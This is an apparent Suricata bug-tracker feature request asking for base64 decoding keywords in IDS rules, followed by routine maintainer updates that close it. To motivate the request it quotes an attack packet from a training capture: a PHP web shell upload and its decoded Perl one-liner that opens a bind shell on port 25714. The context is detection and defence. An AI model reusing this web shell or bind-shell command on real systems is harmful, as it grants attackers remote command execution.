Project

General

Profile

Actions

Feature #380

closed

Base64 decoding

Added by Peter Manev about 13 years ago. Updated over 8 years ago.

Status:
Closed
Priority:
Normal
Assignee:
-
Target version:
-
Effort:
Difficulty:
Label:

Description

I think it is important for Suricata to support Base64 decode/data rule keywords (a few of them).

pcap 22to35.pcap attached.
In it (packet #12 - if you open it with wireshark)

This below is the hex data in packet #12 from 22to35.pcap

3b205048505345535349443d5b2a5d204572726f722072657472696576696e6720636f6f6b6965210a0d0a436f6e74656e742d4c656e6774683a203338350d0a0d0a2d2d6432746d53490d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d227573657266696c65223b2066696c656e616d653d224f624879644269353157677230636a48514936752e706870220d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a0d0a3c3f7068702073797374656d286261736536345f6465636f64652827634756796243417454556c504943316c4943636b6344316d62334a724b436b375a586870644378705a6952774f33646f6157786c4b43526a5057356c6479424a547a6f365532396a613256304f6a704a546b56554b4578765932467355473979644377794e5463784e4378535a58567a5a5377784c4578706333526c62696b74506d466a5932567764436c374a483474506d5a6b6233426c6269676b597978334b5474545645524a5469302b5a6d5276634756754b43526a4c4849704f334e356333526c625352664948646f6157786c504435394a773d3d2729293f3e0d0a2d2d6432746d53492d2d

This below is the same data into text (ASCII)

; PHPSESSID=[*] Error retrieving cookie! ##here at the end most likely there is missing colon, maybe...

Content-Length: 385

--d2tmSI
Content-Disposition: form-data; name="userfile"; filename="ObHydBi51Wgr0cjHQI6u.php" 
Content-Type: text/plain

<?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwO3doaWxlKCRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTcxNCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdCl7JH4tPmZkb3BlbigkYyx3KTtTVERJTi0+ZmRvcGVuKCRjLHIpO3N5c3RlbSRfIHdoaWxlPD59Jw=='))?>
--d2tmSI--

This below is the decoded (from base 64) to asci data in the "php system(base64_decode..." function

perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,25714,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}'

or the attack itself, since this is a pcap from the cyber games/trainings.

We could effectively still search for the data using rules, but we have to covert text to base64 and use it as "content" and it gets tricky.

It would be much easier if we have base64 decode keyword, since there are a lot of on-line apps that use base64.

packet #7 is the same thing.


Files

22to35.pcap (2.25 KB) 22to35.pcap Peter Manev, 11/16/2011 03:51 AM
Actions #1

Updated by Victor Julien over 12 years ago

  • Description updated (diff)
  • Assignee set to OISF Dev
  • Target version set to TBD
Actions #2

Updated by Victor Julien over 11 years ago

The smtp mime decoding work here https://github.com/inliniac/suricata/pull/224 includes a base64 decoder. Maybe we can use that once it's merged.

Actions #3

Updated by Victor Julien almost 9 years ago

This should now be addressed through #1282

Actions #4

Updated by Victor Julien over 8 years ago

  • Status changed from New to Closed
  • Assignee deleted (OISF Dev)
  • Target version deleted (TBD)
Actions

Also available in: Atom PDF